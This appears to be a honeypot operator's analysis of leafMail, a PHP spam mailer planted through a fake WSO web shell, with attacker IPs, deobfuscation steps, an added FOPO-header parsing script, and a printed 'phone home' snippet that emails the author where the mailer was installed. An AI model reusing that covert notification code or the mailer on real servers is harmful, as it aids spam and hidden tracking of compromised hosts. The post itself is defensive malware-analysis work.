Just another email spamming tool with a web page front end. Seems to bill by the email sent, which is weird, since leafMail is a wrapper around PHPMailer, which itself is just a wrapper around PHP's mail() builtin.
73.192.243.136.in-addr.arpa name = monts.historicalorigins.net.
Surprise! monts.historicalorigins.net not in DNS!
Surprise! historicalorigins.net not in DNS!
Neither monts.historicalorigins.net nor historicalorigins.net in whois, either.
whois says 136.243.192.73 is a Hetzner Online IP address; traceroute seems to confirm that the IP address's physical location is in Germany.
p0f3 says that IP address is running "Windows 7 or 8".
Downloaded to a fake WSO web shell, which is part of my WordPress honey pot. The downloader used the "FilesMan" action, "uploadFile" subaction. The downloader tried to create a file named seostyle.php.
The downloading program didn't actually "log in", but rather sent an HTTP cookie that WSO would recognize as meaning that the client had logged in before. Amusing, in that my HTTP server has never seen IP address 136.243.192.73 before.
IP address 136.243.192.73 did try to access a URL containing seostyle.php within one minute of downloading it to my honeypot. The WordPress honey pot did not capture anything of interest from these 2 accesses.
It's FOPO encoded: Sunday, December 4th, 2016 at 12:45 UTC from IP 41.227.252.151.
The current (2018-02-05) LeafMail zip file has a FOPO obfuscation performed June 13th, 2017 at 4:39 UTC from IP 46.32.125.191. LeafMail is actively maintained.
- php ~/src/php/FOPO-PHP-Deobfuscator/ver.-0.22/deobfuscator.php *file > dc1.php
- ~/src/php/reverse-php-malware/pp.php dc1.php > f1.php
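A small triage helper for the FOPO stamps that the deobfuscation step turns up, as an added example that is not part of this post or of the deobfuscator tools listed above. It assumes FOPO's header reads "This code was created on <weekday>, <Month> <day>, <year> at <H:MM> UTC from IP <addr>" (that wording is an assumption, and the two sample headers are constructed from the dates and addresses quoted in this post).

```python
import re
import ipaddress
from datetime import datetime, timezone

# FOPO stamps each obfuscated file with a header comment naming the creation time
# and the submitter's IP. The exact wording matched here is an assumption modelled
# on the quoted values; adjust the pattern if a sample's header differs.
CREATED_RE = re.compile(
    r"This code was created on\s+(?:[A-Za-z]+,\s*)?"        # optional weekday
    r"([A-Za-z]+)\s+(\d{1,2})(?:st|nd|rd|th)?,\s+(\d{4})"   # month, day, year
    r"\s+at\s+(\d{1,2}):(\d{2})\s+UTC"                     # time of day
    r"\s+from IP\s+(\S+)",                                 # submitter's address
)


def parse_fopo_header(source: str):
    """Return {'created': aware datetime, 'ip': str}, or None if no FOPO stamp is found."""
    m = CREATED_RE.search(source)
    if not m:
        return None
    month, day, year, hour, minute, ip = m.groups()
    try:
        created = datetime.strptime(f"{month} {day} {year} {hour}:{minute}", "%B %d %Y %H:%M")
        addr = ipaddress.ip_address(ip)            # rejects garbage in the IP field
    except ValueError:
        return None
    return {"created": created.replace(tzinfo=timezone.utc), "ip": str(addr)}


def compare_stamps(a: str, b: str):
    """Days between two FOPO stamps and whether the same IP submitted both."""
    ra, rb = parse_fopo_header(a), parse_fopo_header(b)
    if ra is None or rb is None:
        return None
    return {"days_apart": (rb["created"] - ra["created"]).days, "same_ip": ra["ip"] == rb["ip"]}


# Constructed samples reproducing the two stamps discussed in this post (not real file contents).
HONEYPOT_SAMPLE = """<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Sunday, December 4th, 2016 at 12:45 UTC from IP 41.227.252.151
*/
"""
LEAFMAIL_PW_SAMPLE = """<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Tuesday, June 13th, 2017 at 4:39 UTC from IP 46.32.125.191
*/
"""

if __name__ == "__main__":
    for name, src in (("honeypot", HONEYPOT_SAMPLE), ("leafmail.pw", LEAFMAIL_PW_SAMPLE)):
        print(name, parse_fopo_header(src))
    print(compare_stamps(HONEYPOT_SAMPLE, LEAFMAIL_PW_SAMPLE))
```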
It's a modified leafMail emailer, wrapper around class PHPMailer, '5.2.14', which dates to Nov 1, 2015.
Instances of leafMail provide a nifty web page to fill in all of the spamming parameters, and it has a login page that appears to have been lifted from WSO web shell.
All the email parameters, to-address(es), from-address, subject, email body, etc, arrive in a set of HTTP POST parameters.
The version of LeafMail downloaded to my honey pot has a file upload function in addition to the email spamming part. Neither the download code nor an additional "phone home" chunk of code appears in the LeafMail I downloaded from leafmail.pw.
The leafmail.pw web page offers 3 different web sites where you can download a Zip file. It looks relatively professional. I can't figure out how LeafMail's developer(s) make money from it.
$ip = getenv("REMOTE_ADDR");              // address of whoever opened the mailer page
$hostname = gethostbyaddr($ip);
// "phone home" notice: tells the author where this copy of the mailer was installed
$bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$bilsnd = "[email protected]";
$bilsub = "New Mailer Uploaded By WS !! {$ip}";
$bilhead = "From: Leaf_WS";
$bilhead .= $_POST['eMailAdd'] . "\n";    // POST parameter appended straight into the From: header
$bilhead .= "MIME-Version: 1.0\n";
$arr = array($bilsnd, $IP);               // $IP (upper case) is never assigned; only $ip is
foreach ($arr as $bilsnd) {
    mail($bilsnd, $bilsub, $bilsmg, $bilhead, $message);
}
The FOPO obfuscator conveniently notes timestamp and IP address of the encoder. Two IP addresses appear, one in the FOPO-encoded material downloaded to my honey pot, another in the FOPO-encoded material I downloaded 2018-02-05 from leafmail.pw.
- 41.227.252.151, Hexabyte, apparently an ISP in Tunis.
- 46.32.125.191, 46.32.125.0/24, AS48832, Zaid Data ISP in Amman, Jordan.